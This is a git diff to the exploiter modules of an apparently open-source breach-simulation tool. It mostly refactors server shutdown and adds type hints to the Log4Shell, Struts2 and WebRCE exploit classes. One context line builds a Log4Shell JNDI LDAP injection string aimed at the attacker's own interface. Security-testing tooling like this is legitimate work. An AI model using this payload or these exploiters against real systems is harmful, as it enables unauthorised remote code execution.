diff --git a/monkey/infection_monkey/exploit/log4shell.py b/monkey/infection_monkey/exploit/log4shell.py index 5b78b0a95..2eada8a0d 100644 --- a/monkey/infection_monkey/exploit/log4shell.py +++ b/monkey/infection_monkey/exploit/log4shell.py @@ -104,11 +104,9 @@ class Log4ShellExploiter(WebRCE): def _stop_servers(self): logger.debug("Stopping all LDAP and HTTP Servers") - self._agent_http_server_thread.stop() - self._agent_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT) + self._agent_http_server_thread.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) - self._exploit_class_http_server.stop() - self._exploit_class_http_server_thread.join(Log4ShellExploiter.DOWNLOAD_TIMEOUT) + self._exploit_class_http_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) self._ldap_server.stop(Log4ShellExploiter.DOWNLOAD_TIMEOUT) @@ -116,7 +114,6 @@ class Log4ShellExploiter(WebRCE): interface_ip = get_interface_to_target(self.host.ip_addr) return f"${{jndi:ldap://{interface_ip}:{self._ldap_port}/dn=Exploit}}" - # TODO remove duplication with infection_monkey.exploit.hadoop.HadoopExploiter.build_command def _build_command(self, path, http_path) -> str: # Build command to execute monkey_cmd = build_monkey_commandline( diff --git a/monkey/infection_monkey/exploit/struts2.py b/monkey/infection_monkey/exploit/struts2.py index 4f6d4f1fd..5efb7a64d 100644 --- a/monkey/infection_monkey/exploit/struts2.py +++ b/monkey/infection_monkey/exploit/struts2.py @@ -32,7 +32,7 @@ class Struts2Exploiter(WebRCE): return exploit_config @staticmethod - def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None): + def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]: url_list = WebRCE.build_potential_urls(ip, ports) url_list = [Struts2Exploiter.get_redirected(url) for url in url_list] return url_list diff --git a/monkey/infection_monkey/exploit/web_rce.py b/monkey/infection_monkey/exploit/web_rce.py index 1396b095d..715a94b1c 100644 --- a/monkey/infection_monkey/exploit/web_rce.py +++ b/monkey/infection_monkey/exploit/web_rce.py @@ -159,7 +159,9 @@ class WebRCE(HostExploiter): raise NotImplementedError() @staticmethod - def get_open_service_ports(victim_host: VictimHost, port_list, names): # noqa: F821 + def get_open_service_ports( + victim_host: VictimHost, port_list: List[Tuple[str, bool]], names: List[str] + ): # noqa: F821 """ :param victim_host: VictimHost object that exploiter is targeting :param port_list: Potential ports to exploit. For example _config.HTTP_PORTS @@ -223,7 +225,7 @@ class WebRCE(HostExploiter): return False @staticmethod - def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None): + def build_potential_urls(ip: str, ports: List[Tuple[str, bool]], extensions=None) -> List[str]: """ Build all possibly-vulnerable URLs on a specific host, based on the relevant ports and extensions. diff --git a/vulture_allowlist.py b/vulture_allowlist.py index b8509e6b8..bb89a7eb7 100644 --- a/vulture_allowlist.py +++ b/vulture_allowlist.py @@ -5,9 +5,6 @@ Vulture doesn't mark these as dead again. """ from infection_monkey.exploit.log4shell_utils.ldap_server import LDAPServerFactory from monkey_island.cc.models import Report -from monkey_island.cc.services.reporting.issue_processing.exploit_processing.exploiter_descriptor_enum import ( - ExploiterDescriptorEnum, -) fake_monkey_dir_path # unused variable (monkey/tests/infection_monkey/post_breach/actions/test_users_custom_pba.py:37) set_os_linux # unused variable (monkey/tests/infection_monkey/post_breach/actions/test_users_custom_pba.py:37)